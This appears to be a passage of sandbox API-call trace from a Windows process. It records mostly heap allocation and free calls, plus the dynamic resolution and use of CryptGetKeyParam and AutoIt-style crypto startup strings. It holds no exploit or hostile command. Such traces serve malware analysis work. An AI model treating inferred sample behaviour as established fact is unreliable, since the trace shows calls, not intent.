[0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0113.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0113.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0113.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0113.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0113.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0113.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0113.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0113.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0113.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.610] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.611] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2890, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2890*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0113.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.613] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.613] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.613] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.616] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.616] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.616] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.616] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.616] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.616] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 